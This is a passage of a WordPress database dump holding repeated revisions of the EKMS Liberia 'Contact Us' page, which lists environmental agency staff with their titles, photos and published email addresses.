src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:28:06','2021-02-25 15:28:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (3513,42,'2021-02-25 15:28:06','2021-02-25 15:28:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:28:06','2021-02-25 15:28:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3514,42,'2021-02-25 15:28:06','2021-02-25 15:28:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:28:06','2021-02-25 15:28:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3515,42,'2021-02-25 15:29:17','2021-02-25 15:29:17','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a 